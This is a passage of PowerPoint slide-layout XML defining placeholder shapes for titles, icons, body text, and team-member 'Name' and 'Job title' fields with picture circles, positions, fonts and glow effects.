              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E77383-C005-DB81-D356-7F1C8FC3D8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410871" y="2078965"/>
            <a:ext cx="659613" cy="626661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Big Icon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ADC9FCB-12F7-7AC2-BA8F-AE04718AEB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410870" y="3257534"/>
            <a:ext cx="5442630" cy="960332"/>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i="0" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3680A47D-AB8D-789D-57B0-511ACFE8F4B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410870" y="5260698"/>
            <a:ext cx="5442630" cy="337718"/>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1" baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9A165A-3134-76E4-0DDE-19348564C98D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410871" y="4449673"/>
            <a:ext cx="659613" cy="626661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Big Icon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D80AF78-AD22-6F04-3EF3-2FC1AD626CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410870" y="5628242"/>
            <a:ext cx="5442630" cy="960332"/>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i="0" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD6A31B-3E8A-F5DC-44DC-0AD3B2E9FECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295520" y="2889990"/>
            <a:ext cx="5442630" cy="337718"/>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1" baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D165A3-AB1E-182B-AF93-5D77F006ED8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295521" y="2078965"/>
            <a:ext cx="659613" cy="626661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Big Icon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353F1CD4-87DE-82AD-594E-E3F5064F7754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295520" y="3257534"/>
            <a:ext cx="5442630" cy="960332"/>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i="0" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3B5923-D014-9772-98B6-19DBBAB52FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295520" y="5260698"/>
            <a:ext cx="5442630" cy="337718"/>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800" b="1" baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4617B73F-CA01-7304-B6B3-3CBC2AE16F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295521" y="4449673"/>
            <a:ext cx="659613" cy="626661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Big Icon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BAB0AA-C96B-8ABF-F4AE-6E5DC8CBEDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295520" y="5628242"/>
            <a:ext cx="5442630" cy="960332"/>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0" i="0" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E35E24-2F5E-091B-86E4-3E233ACA6A59}"/>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12" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B29866-4099-55BF-5D9F-9F13103B8ECD}"/>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31617800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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006E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5C26F9-4486-C223-DBF4-8A71B6D440B3}"/>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l="-682" t="-284" r="22414" b="16169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458199" y="2845232"/>
            <a:ext cx="3733801" cy="4012768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88C1FB0-2C42-D65F-B42E-664B33AE2821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413836" y="3136439"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E46457-EEB3-FCC5-5912-EE019D116834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393740" y="3500491"/>
            <a:ext cx="2095081" cy="410114"/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A6AF36-49BD-37AD-DBE5-4698B2CBC2A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760589" y="1507228"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34574FA3-C9FC-812C-8E79-5292FEDDBDDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322770" y="3136439"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6106D724-A602-FC17-D97A-6041422F3E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302674" y="3500491"/>
            <a:ext cx="2095081" cy="410114"/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D630DB-BFFB-76BD-82E6-0A74EDBC9AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3669523" y="1494076"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47D577D-2A06-31B5-D7EB-5C95FE1D9903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6211607" y="3136439"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA7159A-5E2D-5DE6-D8EC-1804E8F56D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191511" y="3500491"/>
            <a:ext cx="2095081" cy="410114"/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269D743C-6C1E-DACF-852F-DACCF753378E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6558360" y="1507228"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E336A3C2-21EB-E72D-6687-78705B736E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="36" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393740" y="5847699"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89210F48-EBB3-6494-2AEA-2379E2621EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="37" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373644" y="6211751"/>
            <a:ext cx="2095081" cy="410114"/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EE5FCC-0916-581B-C454-1B12D9087326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="38"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740493" y="4218488"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CC9BF1-35B4-363B-E77C-E1ECD0FA2162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302674" y="5847699"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
